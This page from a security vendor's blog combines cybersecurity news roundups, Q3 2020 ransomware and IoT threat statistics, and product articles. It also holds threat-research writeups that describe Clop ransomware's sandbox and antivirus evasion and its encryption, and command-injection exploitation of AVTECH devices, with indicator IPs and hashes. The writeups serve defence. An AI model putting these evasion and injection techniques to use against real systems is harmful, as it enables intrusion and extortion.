Cybersecurity News & Trends – 10-30-20

/0 Comments/in /by

This week, Ryuk is on the rise, medical records are on display, and Maze is on its way out.

SonicWall in the News

Amid Pandemic, Hospitals Warned of ‘Credible’ and ‘Imminent’ Cyberthreat — ABC News

  • SonicWall’s Q3 threat data detailing the increase of Ryuk ransomware is cited in this article, which centers around FBI’s warning of potential attacks against healthcare providers.

Review: The SonicWall SWS12-10FPOE Switch Simplifies Security — BizTech

  • This article reviews the SWS12-10FPOE Switch and mentions the benefit the product will have on small businesses and branch offices.

FBI Warns of Imminent Wave of Ransomware Attacks Hitting Hospitals — CNET

  • SonicWall’s Q3 Threat Data on the surge of ransomware is included in CNET’s article covering potential attacks on the healthcare industry.

Ryuk Wakes From Hibernation; FBI, DHS Warn of Healthcare Attacks —  Cybersecurity Dive

  • Samantha Schwartz included SonicWall’s Q3 Threat data and a quote from CEO Bill Conner in an article on possible upcoming attacks on the healthcare industry.

Venomous Bear and Charming Kitten Are Mentioned In Dispatches. Ryuk Targets Hospitals. Maze Shutdown? — CyberWire

  • CyberWire included a link to SonicWall’s Q3 Threat data press release in the “Cyber Trends” section of its daily newsletter.

Malware Levels Drop Attacks Become More Targeted — BetaNews

  • BetaNews’ article cites SonicWall’s Q3 Threat data, highlighting the drop in malware and the rise in ransomware and IoT malware attacks so far in 2020.

Ryuk Ransomware Responsible for One Third of All Ransomware Attacks in 2020 — Security Magazine

  • Security Magazine reports on SonicWall’s Q3 Threat Data, highlighting the surge in Ryuk ransomware that’s occurred in 2020.

Industry News

Maze ransomware is shutting down its cybercrime operation — Bleeping Computer

  • The Maze cybercrime gang is shutting down its operations after becoming one of the most prominent ransomware groups.

Trump Campaign Website Is Defaced by Hackers — The New York Times

  • The defacement lasted less than 30 minutes, and the hackers appeared to be looking to generate cryptocurrency.

Microsoft says Iranian hackers targeted conference attendees — The Washington Times

  • Iranian hackers reportedly posed as conference organizers in an attempt to break into the email accounts of “high-profile” people.

EXCLUSIVE: Medical Records of 3.5 Million U.S. Patients Can be Accessed and Manipulated by Anyone — Security Week

  • The results of 13 million medical examinations relating to around 3.5 million U.S. patients are unprotected and available to anyone on the internet, SecurityWeek has learned.

Spy agency ducks questions about ‘back doors’ in tech products — Reuters

  • The U.S. National Security Agency is rebuffing efforts by a leading congressional critic to determine whether it is continuing to place so-called back doors into commercial technology products, a controversial practice that critics say damages both U.S. industry and national security.

FBI: Hackers stole government source code via SonarQube instances — Bleeping Computer

  • The FBI issued a flash alert warning of hackers stealing data from U.S. government agencies and enterprise organizations via insecure and internet-exposed SonarQube instances.

Election Officials Warn of Widespread Suspicious Email Campaign — The Wall Street Journal

  • Local election officials in the U.S. have been receiving suspicious emails that appear to be part of a widespread and potentially malicious campaign targeting several states.

Bitcoin Approaches Highest Level Since Post-Bubble Crash in 2018 — Bloomberg

  • Bitcoin is approaching levels not seen in nearly three years.

US Treasury Sanctions Russian Institution Linked to Triton Malware — Dark Reading

  • Triton, also known as TRISIS and HatMan, was developed to target and manipulate industrial control systems, the US Treasury reports.

REvil ransomware gang claims over $100 million profit in a year — Bleeping Computer

  • REvil ransomware developers say that they made more than $100 million in one year of extorting large businesses.

Data breach at Finnish psychotherapy center takes a darker turn with extortion attempts — Cyberscoop

  • Patients of a prominent Finnish psychotherapy practice reportedly had their information posted on the dark web after being told they could protect their data by directly paying a ransom.

In Case You Missed It

Q3 Cyber Threat Intelligence Details a September to Remember

/0 Comments/in /by

Despite predictions from many in the political sphere, the autumn of 2020 didn’t bring an October Surprise. But it did bring plenty of September compromise, as cybercriminals ramped up their nefarious activities to an unprecedented level.

Based on SonicWall’s Q3 cyber threat intelligence data, in nearly every threat category, the numbers for September were doing one of two things: rising, or skyrocketing. Between packed hospitals, unsecure remote students and workers, and perhaps the most high-profile presidential election in the last 50 years, there have never been so many vulnerable to attack — or so many willing to profit from them.

“For most of us, 2020 has been the year where we’ve seen economies almost stop, morning commutes end and traditional offices disappear,” said SonicWall President and CEO Bill Conner. “However, the overnight emergence of remote workforces and virtual offices has given cybercriminals new and attractive vectors to exploit. These findings show their relentless pursuit to obtain what is not rightfully theirs for monetary gain, economic dominance and global recognition.”

SonicWall, which blocks an average of more than 28 million malware attacks globally each day, recorded 4.4 billion malware attacks and 199.7 million ransomware attacks globally through the first three quarters of 2020, a year-over-year decrease of 39% and increase of 40%, respectively. Here’s a closer look at what we found:

Malware down 39% overall … but trending upward

Overall in Q3 2020 malware has continued to drop, falling to 4.4 billion hits — a nearly 40% decrease from last year. The news was even better in some areas; for example, in Germany malware dropped by nearly two-thirds, and in India it fell by nearly 70%, according to SonicWall data.

It’s worth noting, however, that Q3 ended on a much-less-optimistic note. As you’d expect with such a decrease, only two months in 2020 registered an increase in malware: May and September. May’s (relatively) modest gain of 13.3 million was little more than a blip, and quickly reversed itself.

The increase in September, however, is significantly more worrying. First of all, the increase between August and September is nearly five times as large as that between April and May, and added a total of 59 million hits.

Second, since September is the last month in Q3 (and thus the last month for which we have complete data), we don’t know yet if this is an anomaly, or if this is the first sign of malware attacks beginning to rise again from what many had expected to be a slow, but permanent, decline.

Ongoing increase in Ransomware picking up steam

In the mid-year update to the SonicWall 2020 Cyber Threat Report, we noted that the total number of ransomware hits during the first half of the year was up 20% over the same time period in 2019. But with June registering a slight decrease, we hoped that this would mark the beginning of a trend, and that ransomware’s reign of terror would, if not end, at least give us a bit of breathing room during an otherwise difficult time.

In true 2020 fashion, it turns out the opposite has happened, as the 20% increase at the end of Q2 grew to a 40% increase by the end of Q3. While that’s worrying enough, the pace of this increase offers further cause for concern.

After a small increase of 12.4% from June to July (16.7 million to 18.8 million), August and September continued to pick up momentum. Between July and August, total ransomware rose from 18.8 million to 25.5 million, and then from August to September it jumped even more, from 25.5 million to 34.1 million.

Ryuk attacks account for third of year’s ransomware

Much of this increase is coming from the precipitous rise in the number of Ryuk detections. First discovered in August 2018, Ryuk is a relatively young ransomware family, and one that got off to a slow start among SonicWall customers.

Through Q3 2019, SonicWall detected just 5,277 Ryuk attacks. Through Q3 2020, SonicWall detected 67.3 million Ryuk attacks. Not only does this amount to a mind-blowing 1,275,245% increase, it also represents more than a third of all ransomware attacks so far this year.

Ryuk is especially dangerous because it’s targeted, manual and often leveraged via a multi-stage attack (Emotet > Trickbot > Ryuk.) In other words, Ryuk is like the cockroach of the malware world — if you see it, chances are the infestation goes much, much deeper than you think.

The fact that SonicWall is seeing such a large uptick implies that Ryuk may be proliferating to larger groups of criminals, increasing the chances of any one organization being hit. However, this spike could also mean that Ryuk operators have begun hunting outside their usual stomping grounds and have started attacking SMBs and schools as well.

Unfortunately, we’ve also seen an increase in attacks on hospitals — and the problem may soon get much worse. Based on “credible information of an increased and imminent cybercrime threat to U.S. hospitals,” on October 28 CISA, FBI and HHS issued a joint cybersecurity advisory warning that the Ryuk ransomware may gain entry via Trickbot, and strongly advised hospitals and other healthcare facilities to take the recommended steps to protect against being compromised.

IoT malware hits second-highest level ever

In our mid-year update to the 2020 SonicWall Cyber Threat Report, we noted that, if the patterns we were seeing at the time held, total IoT attacks for 2020 would surpass both 2018 and 2019 levels.

Now, with an entire quarter left to go, we’ve already nearly reached that point. Through Q3, SonicWall registered 32.4 million IoT malware attacks, closing in on 2019’s total of 34.4 million attacks and within a hair’s breadth of 2018’s total (32.7 million attacks).

But once again, the real story here is September. During that month, SonicWall recorded 6.8 million IoT malware attacks, up 137% from the previous month, and more than the totals for July and August put together. This number also represents an increase of 69.2% over 2020’s previous high in March, and is 68.7% higher than in September 2019.

5G and the Security of Connected Devices

/0 Comments/in /by

In a world with watches that wirelessly beam video across the country, refrigerators that can read you the local weather report and Wi-Fi-enabled barbecue grills, it’s hard to imagine the world of connected devices becoming much more complex.

But the imminent 5G revolution is likely to bring with it devices that advance comfort, convenience, entertainment and safety in ways we never thought possible — all of which will need secure wireless controls as to not be turned against us.

During the final week of National Cybersecurity Awareness Month (NCSAM), we’re taking a closer look at the future of 5G and internet-connected devices — how they could benefit us, what sorts of dangers they could pose, and what we can do to secure them, both now and into the future.

“5G will pump $12 trillion into the global economy by 2035 and add 22 million new jobs in the United States alone”

According to the New Yorker, “5G will pump $12 trillion into the global economy by 2035 and add 22 million new jobs in the United States alone,” while ushering in “a fourth industrial revolution.”

This could be hard to imagine if you primarily view 5G as something that could someday allow you to download the entire Harry Potter film catalog faster than you can say “Accio Nostalgia!” But the true value of 5G to society is likely to come in the form of technological advancements not intended for the consumer market, such as robots making precision-machined components in a factory; surgeons using VR headsets and gloves to perform surgeries remotely; and smart cities that function as a sort of macrocosm of our current smart homes, tying together things like trash collection, parking meters and public restrooms to improve safety, sanitization and convenience.

That isn’t to say there won’t be plenty for the average consumer to enjoy, however. Truly autonomous vehicles that connect with traffic signals and other vehicles and react more quickly than human drivers are already in the works, and console-quality video games on your phone (or video games on your console with near-zero lag) are a logical next step once the anticipated reductions in latency come to pass.

Stores that allow you to try on clothing without stepping foot into a dressing room — or see what a new sofa would look like in your living room without leaving the furniture store — are a natural progression from the sort of augmented reality first brought to the mainstream by Pokémon Go.

And that’s to say nothing of your cellphone: anticipated download speeds of up to 10 Gbps will revolutionize what you can do with your phone, how quickly you can do it, and how many things you can do at once without affecting performance.

But as with other advances in digital technology, the same things that can make life easier for us can also make life immeasurably more difficult in the hands of cybercriminals. 5G will significantly increase the number of IoT devices coming online — and right now IoT security regulations are basically nonexistent.

As a result, as this increasing attack surface continues to draw more cybercriminals, we’re likely to see skyrocketing rates of IoT malware. The addition of more devices and more bandwidth doesn’t just give cybercriminals more to target directly — it could also bring about DDoS attacks far more debilitating and widespread than the ones we see today. Wireless security will be a must.

To stop the influx of attacks will require the cooperation of all stakeholders. Minimum cybersecurity requirements for manufacturers of IoT devices would go a long way toward preventing attacks, as would the establishment of a rating system (similar to the ones that currently measure usage cost on water heaters) to inform customers how safe a particular device is compared to others.

There are also things users can do to stay safe — many of which are best practices now, but will become crucial as 5G technology is fully adopted:

  • Install malware protection on your devices, if it isn’t there already
  • Ensure that none of your devices, particularly IoT devices, are still using the factory default password
  • Always make sure that your devices are patched and running the latest OS version
  • Keep up with the latest developments in cybercrime — just because you’re adequately secured now doesn’t mean you will be in the future
  • Only purchase internet-connected devices from companies who have made securing these devices a top priority.

As Champions of National Cyber Security Awareness Month, SonicWall is committed to helping organizations develop strategies for anywhere, anytime, any device security — not just during October, but all year long. For more cybersecurity news and tips, follow us on social media and check out our blog.

A new variant of Clop Ransomware surfaces

/in /by

The SonicWall Capture Labs threat research team observed reports of a new variant family of Clop ransomware (Detected as Clop.RSM) actively spreading in the wild.

The Clop ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle

The ransomware adds the following files to the system:

  • Malware.exe
  • %CurrentFolder%\HotGIrls (ZeroKb)
  • %CurrentFolder%\Clearnetworkdns_11-22-33.bat

In order to deceive the emulator and avoid execution of the real malicious code in the time bound sandboxes, it calls APIs from Kernel32.dll with invalid parameters. The loop is repeated 666000 times.

After the completion of the loop it starts enumerating running process.

Malware checks the presence of below processes belonging to security vendors:

  • SBAMSvc.exe (GFI AntiMalware antivirus product)
  • VipreAAPSvc.exe (Vipre antivirus product)
  • SBAMTray.exe (Vipre antivirus product)
  • SBPIMSvc.exe (Sunbelt AntiMalware antivirus product)
  • WRSA.exe (WebRoot antivirus product)

If it finds the presence any of these processes it delay the execution by 10 seconds by calling Sleep() api twice with 5 seconds as a parameter.

It creates a Mutex “^_-HappyLife^_-” and checks if its was previously created by calling “WaitForSingleObject” and checking the result with 0. If the result is non zero it means that another instance is running, in that case it exits.

After that it follows the normal execution path (the execution path in which there was no presence of above mentioned security vendor processes)

It drops a batch file in the current folder from where the malware sample is executed and executes the batch file using ShellExecute API.

It then creates two threads, one of the thread uses MPR.DLL for enumerating network resources and encrypting files found on the network drives and other thread is used for enumerating running process:

It searches directory and sub directory using FindFirstFile and FindNextFile APIs, after which a unique hash is calculated using path of the FileName / FolderName which are then compared with hardcoded hash values. If the hash matches the Folder or the File are not encrypted:

In the second thread it starts enumerating the processes, the name of the process are then converted into the upper case:

And using the same logic which was used to calculate the hash value for the FileName /FolderName a unique hash value is calculated.
The hash value is then compared with hardcoded hash values and the process for which the hash is matched is terminated.

It encrypts each bytes of the file with the randomly generated AES key, after encryption at the end of the file it adds the mark “Clop^_”. After the mark it puts the key used to crypt the file ciphered with the master RSA key that has hardcoded the malware.

The .Clop extension is appended to the encrypted files.

And in each folder it drops the ClopReadMe.txt containing ransom note.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Clop.RSM (Trojan)

Cybersecurity News & Trends – 10-23-20

/0 Comments/in /by

While election security is still making headlines, education news moved to the forefront this week as K-12 institutions continue fighting off a barrage of cyberattacks.

SonicWall in the News

Hackney Council Cyberattack: Why Are Hackers Targeting The Public Sector? — IT Supply Chain

  • Terry Greer-King, VP of EMEA at SonicWall, offers some perspective on the Hackney Council cyberattack — and a warning to other public bodies.

National Cybersecurity Awareness Month – Empower Organizations in Cybersecurity Protocols — Business 2 Community

  • Companies should be doing more to defend against cyberattacks, and during Cybersecurity Awareness Month, cybersecurity professionals are committed to telling you how.

Ripple20 Isn’t An Anomaly – IoT Security is a Mess (Still) — Infosecurity Magazine

  • A new SonicWall report found a 50% increase in IoT malware attacks in the first half of 2020 alone — a number that’s sure to rise further as the number of IoT devices coming online continues to rise.

Industry News

UK’s GCHQ spy chief: We must engage business to harness cyber talent for future — Reuters

  • The head of Britain’s GCHQ agency said on Wednesday it was seeking to engage more with business to harness top cyber talent.

Botnet Fights Back After Microsoft’s Election Security Takedown — Bloomberg

  • After Microsoft led a global attack against a highly prolific malware group, the company says it’s winning the battle to destabilize the malicious botnet ahead of the U.S. presidential election.

LockBit ransomware moves quietly on the network, strikes fast — Bleeping Computer

  • LockBit ransomware takes as little as five minutes to deploy the encryption routine on target systems once it lands on the victim network.

Mysterious ‘Robin Hood’ hackers donating stolen money — BBC

  • Darkside hackers claim to have extorted millions of dollars from companies, but say they now want to “make the world a better place.” In a post on the Dark Web, the gang posted receipts for $10,000 in Bitcoin donations to two charities.

U.S. Accuses Google of Illegally Protecting Monopoly — The New York Times

  • A victory for the government could remake one of America’s most recognizable companies and the internet economy that it has helped define.

Hackers Smell Blood as Schools Grapple With Virtual Instruction — The Wall Street Journal

  • Many K-12 schools opting for virtual instruction distributed devices to students and teachers. Now, as this unique school year unfolds, hackers are circling.

TrickBot malware under siege from all sides, and it’s working — Bleeping Computer

  • The Trickbot malware operation is on the brink of going down completely following efforts from an alliance of cybersecurity and hosting providers targeting the botnet’s command-and-control servers.

Democrats introduce bill providing $400 million to protect schools from cyberattacks — The Hill

  • The Enhancing K-12 Cybersecurity Act would establish a $400 million “K-12 Cybersecurity Human Capacity” grant program to help protect educational institutions against attacks.

Hackers now abuse BaseCamp for free malware hosting — Bleeping Computer

  • Phishing campaigns have started using Basecamp as part of malicious phishing campaigns that distribute malware or steal login credentials.

Fancy Bear Imposters Are on a Hacking Extortion Spree — Wired

  • Companies worldwide are getting extortion notices from hackers, which claim to be Fancy Bear or the Lazarus Group, warning them to pay up or face powerful DDoS attacks.

Federal watchdog finds escalating cyberattacks on schools pose potential harm to students — The Hill

  • The Government Accountability Office (GAO), a federal watchdog agency, has concluded that an increasing number of cyberattacks on educational institutions are putting students increasingly at risk.

Thousands of infected IoT devices used in for-profit anonymity service — Ars Technica

  • Some 9,000 devices — mostly Android, but also Linux and Darwin OS— have been corralled into the Interplanetary Storm, a botnet whose chief purpose is creating a for-profit proxy service.

Trump signs legislation making hacking voting systems a federal crime — The Hill

  • Trump has signed the Defending the Integrity of Voting Systems Act unanimously approved by the House last month, over a year after the Senate also unanimously passed the legislation.

In Case You Missed It

Capture Client: Purpose-Built for the Distributed Workforce

/0 Comments/in /by

Before COVID-19 shelter-in-place orders were enacted across North America, I created several educational pieces on the subject of the distributed workforce. At that time, 70% of endpoints in the average company could be found outside the walls of the office at least once a week, and 53% of them could be away from perimeter defenses and physical accountability half of the week or more.

Now that this percentage has risen to nearly 100%, the focus at SonicWall is to give companies more visibility into what endpoints are doing, as well as more tools to keep people accountable, productive and safe online, whether or not they are coming in through VPN.

SonicWall Capture Client was designed to be a standalone security offering with optional built-in synergies with the SonicWall ecosystem. It was intended for the distributed workforce from Day One, and since then we’ve added more tools to stop attacks before they can damage systems, more freedom to add granular controls to web content, and soon, more tools for those who manage tenants.

From the solution’s first build, the goal has been to stop attacks before and as they execute, with remediation steps to quickly resolve problems if an attack ever causes damage. Since those early days, we’ve added Capture ATP sandboxing integration, Device Control to stop infected USB devices, Attack Visualization and more.

Today, Capture Client is widely relied on to keep remote employees safe from outside threats as well as from harmful web properties. By combining Security, Web Filtering and Device Control, Capture Client offers an ideal work-from-home solution:

Security

SonicWall has always been a security-first company. From our beginnings in network security, protecting endpoints from outside threats is in our corporate DNA.

Since many endpoints may not be connecting with the company infrastructure via VPN, endpoint security is usually the first and last line of defense. By leveraging the SentinelOne anti-malware engine, which combines AI with Capture ATP sandboxing integration, we are stopping most (nearly all) attacks before and as the execute. First, the AI engine is constantly monitoring system changes for malicious intent. Secondly, if the engine can’t fully convict a suspicious file, it will be sent to a Capture ATP PoP (Point of Presence) for evaluation. Since Capture ATP can do more with a file than your endpoint is allowed to do by the OS, it can flush out sleeping or seemingly innocuous threats.

This means that, if an employee downloads a malicious attachment from their private email or lands on an infected phishing site, Capture Client’s continuous monitoring technology will stop the attack and inform the end user of the event. If an employee downloads a file designed to activate and connect with a C&C server at a designated time in the future, Capture ATP will identify the threat. If remediation is required, administrators can step in and quickly get any Windows machine back to its last known clean state, no matter where the endpoint sits.

Web Filtering

Years ago, SonicWall first developed Content Filtering Service (CFS) for firewalls — and Content Filtering Client (CFC) — based on our work with school districts, where the goal was to protect the most impressionable among us from abusive content and prevent sites like YouTube from taking too much of a school’s bandwidth. CFS and CFC (which is used to enforce the polices on devices away from firewalls) were built with a lot of tools for those that needed it most — but the business community was also able to benefit from its granular control of web content as needed. These tools have now been added to Capture Client for your use; here are some use cases listed in order of commonality for business users:

Blocking malicious content

The little-known secret that I am trying to reveal is that a lot of companies have access to Content Filtering in one shape or form, but don’t use it. You don’t have to get fancy with it; you can simply use it to block millions of known malicious phishing sites, hacking domains and other malicious IP addresses (think botnets or C&C servers).

Blocking inappropriate material

Every company has an Internet usage policy to help employees avoid certain categories of web content. There are over 50 categories such as Adult/Mature Content, Drugs/Illegal Drugs, Illegal Skills, or Nudism that can be blocked.

Blocking specific social media outlets

When shelter-in-place orders forced workers to stay in their homes, the first complaints from admins I heard (outside of VPN connectivity) were about trying to keep the network open for business traffic due to too many users watching TikTok videos. Some admins will create granular policies to block TikTok, yet keep YouTube open. Policies can also be created to give marketing departments access to Facebook and Twitter, but block their use by those in other departments.

Bandwidth management

If, for example, YouTube is taking up too much bandwidth as people are pulling it through your servers via VPN, one could limit the amount of bandwidth a specific web property can use.

Device Control

In 46% of American homes, both parents are working — which means endpoints from two different companies may sit side by side most of the day. How many of these couples use the same USB devices? Capture Client has the ability to block unknown devices from connecting to the employee endpoint to prevent infection by a compromised USB from another company’s endpoint. If malware was to jump between companies in 2020, this might be a top-three threat vector. But even if you don’t use the Device Control feature, the AI engine within Capture Client will still notice the malicious behavior and stop any malicious scripts from executing.

Conclusion

In short, Capture Client helps secure work-from-home by being a top-in-class, first and last line of defense against online attacks and infected devices, as well as enforcing your internet usage policies. If you’d like more information on how Capture Client keeps people working safely no matter where they are, you’re welcome to listen to one of my recent webcasts, “You Can’t Stop What You Can’t See.”

Attackers actively targeting vulnerable AVTECH devices

/in /by

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in AVTECH devices. AVTECH’s primary products are DVR and mobile surveillance systems. It’s products target the IP camera market and are commonly used in intelligence surveillance systems.
Attackers are targeting following two vulnerabilities in AVTECH’s products :

1.Unauthenticated command injection in DVR devices

The cgi_query action in Search.cgi performs HTML requests with the wget system command, which uses the received parameters without sanitization or verification. By exploiting this issue, an attacker can execute any system command with root privileges without authentication.

Following are the list of exploits spotted in the wild

2. Authenticated command injection in CloudSetup.cgi

Devices that support the Avtech cloud contain CloudSetup.cgi, which can be accessed after authentication. The exefile parameter of a CloudSetup.cgi request specifies the system command to be executed.Since there is no verification or white list-based checking of the exefile parameter, an attacker can execute arbitrary system commands with root privileges.

Following are the list of exploits spotted in the wild for this vulnerability

Decoding the URLs and taking a closer look at them .

Both exploits connect to malicious domain and download a shell script. The exploit changes the file permissions and executes the shell script. This in turn is again used to connect to the attacker controlled server to download more malicious files.

SonicWall Capture Labs provides protection against this threat via following signatures:

  • IPS 14697:AVTECH Devices Command Injection
  • IPS 13035:AVTECH Devices Remote Command Execution
  • GAV:Mirai.H
  • GAV:Mirai.H_2
  • GAV:MiraiA.N
  • GAV:MiraiA.N_2

Threat Graph

IoCs:
185.172.110.205
185.172.110.241
185.172.111.196
185.172.111.202
45.95.168.98
dcdeae98d9ab0fa3005ec36b1f55bb5b
99d3ce410735ba5e7008198aae3a6e39
4dcfa2daeb85d89da784e5e1928062de
148a1941582372ce22eacf86b5c7f852

 

Securing Internet-Connected Devices in Healthcare

/0 Comments/in , , /by

This article is based on an interview with SonicWall PreSales Engineer Barbara Vibbert, who spent 10 years in healthcare IT and more than 20 years in information security.

From the carts that roll from room to room checking vital signs to the tablet at the check-in desk, internet-connected devices can be seen during every hospital visit. What isn’t visible, however, is the massive infrastructure required to connect and secure them.

While these connected devices have brought countless benefits to healthcare, they also have the potential to endanger patient privacy, data integrity and even the continued survival of the hospitals themselves.

Access control in healthcare environments

Most doctors are not employed by the hospital where they work. Nor are many of the people in charge of maintaining equipment. These individuals have their own laptops, tablets and other devices that IT has no control over, but they require network access in order to do the jobs that keep the hospital running.

Hospitals’ vast access control teams are also needed to regularly onboard large numbers of people at once. In most IT departments, users are onboarded and offboarded throughout the year as employees come and go. In hospitals, however, a large influx of new users must be added each year around July 1, when hospital residencies begin. There can be hundreds of new residents and fellows per year that require onboarding, but hospitals generally only have a five-day window to get them up and running.

An equally sizeable, but completely unpredictable, wave of new users must be onboarded during nursing strikes. Depending on the size of the nursing staff, IT may have to quickly add several hundred new visiting nurses to the network with little warning.

Even within the hospital, data must be accessible for purposes not directly tied to patient care; for example, research and billing. But greater accessibility always brings with it greater risk. In May, an Ohio medical center posted an Excel spreadsheet on its website to comply with new requirements about cost transparency. However, inadvertently included in the spreadsheet were the names, diagnoses, treatment histories and other information of nearly 4,000 patients — a major violation of patient confidentiality laws.

Teleworking in healthcare environments

The online services that hospitals use also have patient privacy implications — and with many healthcare workers now working from home, this is a bigger concern than ever. For example, many hospitals don’t host their own telemedicine, relying instead on Zoom-like platforms … or Zoom itself. Because these sorts of platforms weren’t designed to comply with the heightened privacy regulations governing the healthcare industry, they can present a privacy risk.

The danger here isn’t limited to online interlopers, however. With employees no longer afforded the seclusion of their offices, a number of low-tech privacy risks emerge. For example, if a medical professional is doing a psychiatric consultation from home, a spouse, roommate or even a passer-by could potentially see and hear what’s being discussed through an open door or window.

IoT Devices in healthcare environments

Human-operated devices aren’t the only ones that need safeguarding. Hospitals use countless Internet of Things (IoT) devices, responsible for everything from monitoring patient heart rates, to regulating sleep apnea, to ensuring new parents don’t accidentally leave the hospital with the wrong baby.

You don’t need to worry about cybercriminals hacking into your blood pressure cuff or pulse oximeter, however — these devices are on a separate network that is highly secured and largely inaccessible.

This is largely due to the widespread inability to update and patch these devices. FDA approval is required for any device that comes into contact with a patient. But that approval only extends to the device’s state at the time of approval.

In other words, patching, updating or otherwise altering these devices nullifies the approval. To get around this security hurdle, hospitals make extensive use of firewalls: Without them, having a device on the network that can make the difference between life and death, but can also contain unpatchable vulnerabilities, would simply be too big a liability.

… Plus All the Usual Suspects

If that wasn’t enough, hospitals still have to contend with the standard IT hazards, such as phishing, ransomware and remote work risks. Hospital IT should be the last line of defense against phishing — busy doctors and nurses can’t be expected to investigate the legitimacy of emails when every second spent doing so is one less spent on patient care.

But given the massive uptick in attacks targeting hospitals, the number of phishing emails that get through and successfully fool employees is on the rise. According to Healthcare Finance, during a recent study employees clicked on roughly 1 in 7 simulated phishing emails, putting hospitals at risk for threats such as credential theft and ransomware.

And ransomware has the potential to be especially devastating for hospitals. Taking the billing department offline for a week can put any hospital in a tight spot, or in the case of smaller hospitals, even drive them to bankruptcy. And without the ability to collect or access patient data, facilities have to turn patients away — which can be deadly.

How hospitals, healthcare organizations can improve security hygiene

While more devices necessarily means more risk, these risks can be mitigated. One way is through network segmentation. By isolating different parts of the care practice, hospitals could reduce the potential destructiveness of cyberthreats. And with fewer people able to access each piece of patient data, privacy risks would be reduced as well.

There are also several steps individuals can take:

  • Keep devices patched and up to date. This is a good habit in general, but it’s crucial when accessing hospital networks from home.
  • Deploy a firewall for your home network. (Even the one built into Windows offers some protection.)
  • Use next-generation antimalware protection. Today’s advanced threats can bypass traditional signature-based antivirus software.

As Champions of National Cyber Security Awareness Month, SonicWall is committed to helping organizations in every industry protect against the threats of today and prepare for the threats of tomorrow. To learn more, check back next week as we explore what future threats could look like, and how we as individuals can help prevent them.

Nibiru ransomware actively spreading in the wild

/in /by

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of NIBIRU ransomware [NIBIRU.RSM] actively spreading in the wild.

The NIBIRU ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. <NIBIRU >

Once the computer is compromised, the ransomware runs the following commands: (Actual Source code)

When NIBIRU is started it will create and assign a unique ID number to the victim then scan all local drives for data files to encrypt.

When encrypting files it will use the AES encryption algorithm and only encrypt those files that match the following extensions:

The ransomware encrypts all the files and appends the [NIBIRU] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: NIBIRU.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Another Reason to Not Pay the Ransom: Trouble with Uncle Sam

/0 Comments/in /by

It’s an idea so ingrained in our culture that it’s been repeated by action movie stars, debated at length by political scholars, and cited in literature from young-adult fiction to parenting advice books: Do not negotiate with terrorists.

The rationale, according to Peter R. Neumann, director of the Center for Defense Studies at King’s College, London, is simple: “Democracies must never give in to violence, and terrorists must never be rewarded for using it. Negotiations give legitimacy to terrorists … undercut international efforts to outlaw terrorism, and set a dangerous precedent.”

If you’re an everyday civilian, it’s hard to imagine any practical application for this knowledge aside from the occasional action movie daydream. But there is, in fact, a situation in which everyday people are routinely given the choice of whether to negotiate with criminals: Ransomware.

Ransomware is a growing problem, and the COVID-19 pandemic seems to have accelerated this growth. According to the mid-year update to the SonicWall Cyber Threat Report, ransomware overall rose 20% during the first half of 2020. While some areas, such as the U.K., saw a year-over-year decline, the spike in ransomware in North America more than made up for it. The U.S., in particular, saw a staggering 109% increase in ransomware during the first half of 2020.

Last year, the monthly ransomware totals followed a neat, sine-wave-like pattern. In 2020, the numbers have been much more erratic. The late summer trough of 2019 never materialized this year — instead, numbers reversed course in July and have been skyrocketing since. The data from September, the most recent data we have, shows a staggering 34,112,981 ransomware attacks — more than double­ the total for September of last year. It’s too soon to see what the totals for October will be, but if the trends from last year hold, that number could climb even higher.

Worse still, the percentage of overall attacks focused on SMBs, education, local governments, public administration agencies, and even hospitals has been increasing as well. Because these organizations are usually smaller, and are working within tighter budgets, they often lack the security of larger companies — meaning ransomware attempts are more likely to succeed.

Should you pay a ransomware ransom?

Modern companies are built on, depend on and, in some cases, owe their existence to data. Faced with the prospect of starting over from square one, enduring major operational disruption and facing damage to customer relationships and reputation, some ransomware victims are tempted to pay the ransom just to make the problem go away.

But this isn’t advisable, for several reasons. For one, the criminals could simply abscond with your money — while ransomware operators tend to uphold their end of the bargain based on a very twisted concept of honor, not all do. Even dealing with an “ethical” ransomware operator gives no guarantees — it isn’t at all rare for the decryption key to be granted, only for the victim to find it didn’t decrypt the data entirely … or at all. According to a recent survey by research and marketing firm CyberEdge Group, nearly 1 in 5 ransomware victims surveyed paid the ransom and still lost all their data for good.

There’s also the matter of reinforcement: If you pay the ransom, your experience becomes a case study in why ransomware works and is a profitable and worthwhile undertaking. The more successful ransomware appears to be, the more attractive it becomes to those wishing to make a quick buck — potentially for the purpose of funding even more unsavory activities.

But if all of this isn’t enough of a deterrent — and obviously for some companies it isn’t, or we wouldn’t still be seeing ransomware — there’s also the chance that paying the ransom could get you in trouble with Uncle Sam.

On Oct. 1,  the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) issued an advisory stating that in some cases, paying ransoms could be illegal. Any organizations that do so — regardless of whether it’s the victim company or a third party that facilitated the ransom payment — could be violating OFAC regulations and thus be subject to prosecution and hefty fines.

At issue here isn’t the payment of the ransom itself — it’s who the ransom is going to. The U.S. Department of the Treasury administers sanctions against countries and regimes, terrorists, and others recognized as threats to national security or the U.S. economy based on US foreign policy and national security goals. These individuals, groups and entities are recorded in the OFAC Sanctions List— which includes “numerous malicious cyber actors under its cyber-related sanctions program and other sanctions programs, including perpetrators of ransomware attacks and those who facilitate ransomware transactions,” according to the advisory.

In short, if the ransomware you’re infected with has been associated with an individual or group deemed to be a threat to the United States, you could have to pay.

Among the groups and individuals mentioned by name are some of the most well-known and prolific cybercriminals: Evgeniy Mikhailovich Bogachev (developer of Cryptolocker), individuals associated with the SamSam ransomware, the Lazarus Group and two subgroups (linked to WannaCry), and Evil Corp (cited for its involvement with Dridex malware, but also recently connected with WastedLocker). Note, however, that these were listed as examples, and not an all-inclusive list: There are other cybercriminals on the list, and more could be added at any time.

